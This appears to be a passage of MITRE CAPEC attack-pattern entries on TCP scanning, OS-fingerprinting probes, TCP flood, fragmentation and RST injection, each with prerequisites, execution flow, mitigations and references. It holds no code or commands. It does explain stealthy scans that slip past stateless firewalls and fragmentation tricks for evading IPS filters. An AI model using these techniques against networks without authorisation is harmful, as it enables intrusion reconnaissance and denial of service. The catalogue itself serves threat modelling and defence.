2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Execution_Flow, Notes
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-325: TCP Congestion Control Flag (ECN) Probe

Attack Pattern ID: 325

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses

CAPEC-301: TCP Connect Scan

Attack Pattern ID: 301

Abstraction: Detailed

View customized information:

Description

Extended Description

RFC 793 defines how TCP connections are established and torn down. TCP connect scanning commonly involves establishing a full connection, and then subsequently tearing it down, and therefore involves sending a significant number of packets to each port that is scanned. Compared to other types of scans, a TCP Connect scan is slow and methodical. This type of scanning causes considerable noise in system logs and can be spotted by IDS/IPS systems. TCP Connect scanning can detect when a port is open by completing the three-way handshake, but it cannot distinguish a port that is unfiltered with no service running on it from a port that is filtered by a firewall but contains an active service. Due to the significant volume of packets exchanged per port, TCP connect scanning can become very time consuming (performing a full TCP connect scan against a host can take multiple days). Generally, it is not used as a method for performing a comprehensive port scan, but is reserved for checking a short list of common ports.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary attempts to initialize a TCP connection with with the target port.
An adversary uses the result of their TCP connection to determine the state of the target port. A successful connection indicates a port is open with a service listening on it while a failed connection indicates the port is not open.

Prerequisites

The adversary requires logical access to the target network. The TCP connect Scan requires the ability to connect to an available port and complete a 'three-way-handshake' This scanning technique does not require any special privileges in order to perform. This type of scan works against all TCP/IP stack implementations.

Resources Required

The adversary can leverage a network mapper or scanner, or perform this attack via routine socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Employ a robust network defense posture that includes an IDS/IPS system.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 54. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 5.3 TCP Connect Scanning, pg. 100. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-302: TCP FIN Scan

Attack Pattern ID: 302

Abstraction: Detailed

View customized information:

Description

Extended Description

In addition to its relative speed in comparison with other types of scans, the major advantage a TCP FIN Scan is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. FIN packets, like out-of-state ACK packets, tend to pass through such devices undetected. FIN scanning is still relatively stealthy as the packets tend to blend in with the background noise on a network link.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends TCP packets with the FIN flag but not associated with an existing connection to target ports.
An adversary uses the response from the target to determine the port's state. If no response is received the port is open. If a RST packet is received then the port is closed.

Prerequisites

FIN scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

Resources Required

This attack pattern requires the ability to send TCP FIN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

FIN scans are detected via heuristic (non-signature) based algorithms, much in the same way as other scan types are detected. An IDS/IPS system with heuristic algorithms is required to detect them.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Notes

Other

Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. FIN scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, FIN scanning a system protected by a stateful firewall may indicate all ports being open. For these reasons, FIN scanning results must always be interpreted as part of a larger scanning strategy.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 55. 6th Edition. McGraw Hill. 2009.

[REF-147] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107. 3rd "Zero Day" Edition. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, References, Related_Weaknesses, Resources_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Execution_Flow, Mitigations, Notes
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	TCP FIN scan

CAPEC-482: TCP Flood

Attack Pattern ID: 482

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server.

Mitigations

To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1498.001	Network Denial of Service: Direct Network Flood
1499.001	Endpoint Denial of Service: OS Exhaustion Flood
1499.002	Endpoint Denial of Service: Service Exhaustion Flood

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Taxonomy_Mappings

CAPEC-494: TCP Fragmentation

Attack Pattern ID: 494

Abstraction: Standard

View customized information:

Description

Extended Description

In comparison, IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. This behavior of fragmentation defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled.

Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the target system to be running a vulnerable implementation of IP, and the adversary needs to ability to send TCP packets of arbitrary size with crafted data.

Mitigations

This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule "IF FO=1 and PROTOCOL=TCP then DROP PACKET" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling
404	Improper Resource Shutdown or Release

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-423] "Security Considerations - IP Fragment Filtering". <https://www.rfc-editor.org/rfc/rfc1858.txt>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description, Prerequisites

CAPEC-326: TCP Initial Window Size Probe

Attack Pattern ID: 326

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses

CAPEC-304: TCP Null Scan

Attack Pattern ID: 304

Abstraction: Detailed

View customized information:

Description

Extended Description

In addition to being fast, the major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. NULL packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, NULL scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, NULL scans are flagged by almost all intrusion prevention or intrusion detection systems.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends TCP packets with no flags set and that are not associated with an existing connection to target ports.
An adversary uses the response from the target to determine the port's state. If no response is received the port is open. If a RST packet is received then the port is closed.

Prerequisites

The adversary requires logical access to the target network. NULL scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

Resources Required

This attack can be carried out via a network mapper/scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Employ a robust network defensive posture that includes a managed IDS/IPS.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Notes

Other

Many operating systems do not implement RFC 793 exactly and for this reason NULL scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing the adversary from distinguishing between open and closed ports. NULL scans are limited by the range of platforms against which they work.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Execution_Flow, Mitigations, Notes
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-327: TCP Options Probe

Attack Pattern ID: 327

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses

CAPEC-307: TCP RPC Scan

Attack Pattern ID: 307

Abstraction: Detailed

View customized information:

Description

An adversary scans for RPC services listing on a Unix/Linux host.

Extended Description

This type of scan can be obtained via native operating system utilities or via port scanners like nmap. When performed by a scanner, an RPC datagram is sent to a list of UDP ports and the response is recorded. Particular types of responses can be indicative of well-known RPC services running on a UDP port. Discovering RPC services gives the adversary potential targets to attack, as some RPC services are insecure by default.

Direct RPC scans that bypass portmapper/sunrpc are typically slow compare to other scan types, are easily detected by IPS/IDS systems, and can only detect open ports when an RPC service responds. ICMP diagnostic message responses can help identify closed ports, however filtered and unfiltered ports cannot be identified through TCP RPC scans. There are two general approaches to RPC scanning: One is to use a native operating system utility, or script, to query the portmapper/rpcbind application running on port 111. Portmapper will return a list of registered RPC services. Alternately, one can use a port scanner or script to scan for RPC services directly.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends RCP packets to target ports.
An adversary uses the response from the target to determine which, if any, RPC service is running on that port. Responses will vary based on which RPC service is running.

Prerequisites

RPC scanning requires no special privileges when it is performed via a native system utility.

Resources Required

The ability to craft custom RPC datagrams for use during network reconnaissance via native OS utilities or a port scanning tool. By tailoring the bytes injected one can scan for specific RPC-registered services. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Typically, an IDS/IPS system is very effective against this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-158] J. Postel. "RFC768 - User Datagram Protocol". 1980-08-28. <http://www.faqs.org/rfcs/rfc768.html>.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 7.5.2 RPC Grinding, pg. 156. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-596: TCP RST Injection

Attack Pattern ID: 596

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	595	Connection Reset

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

An On/In Path Device

Related Weaknesses

CWE-ID	Weakness Name
940	Improper Verification of Source of a Communication Channel

References

[REF-477] John-Paul Verkamp and Minaxi Gupta. "Inferring Mechanics of Web Censorship Around the World". USENIX. 2012.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-03 (Version 2.8)	Seamus Tuohy
2017-01-03 (Version 2.8)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-321: TCP Sequence Number Probe

Attack Pattern ID: 321

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 55-56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, Related_Weaknesses

CAPEC-299: TCP SYN Ping

Attack Pattern ID: 299

Abstraction: Detailed

View customized information:

Description

Extended Description

Due to the different responses from open and closed ports, SYN packets can be used to determine the remote state of the port. A TCP SYN ping is also useful for discovering alive hosts protected by a stateful firewall. In cases where a specific firewall rule does not block access to a port, a SYN packet can pass through the firewall to the host and solicit a response from either an open or closed port. When a stateful firewall is present, SYN pings are preferable to ACK pings because a stateful firewall will typically drop all unsolicited ACK packets as they are not part of an existing or new connection. TCP SYN pings often fail when a stateless ACL or firewall is configured to blanket-filter incoming packets to a port. The firewall device will discard any SYN packets to a blocked port. Often, an adversary will alternate between SYN and ACK pings to discover if a host is alive.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to send a TCP SYN packet to a remote target. Depending upon the operating system, the ability to craft SYN packets may require elevated privileges.

Skills Required

[Level: Low]

The adversary needs to know how to craft and send protocol commands from the command line or within a tool.

Resources Required

SYN pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

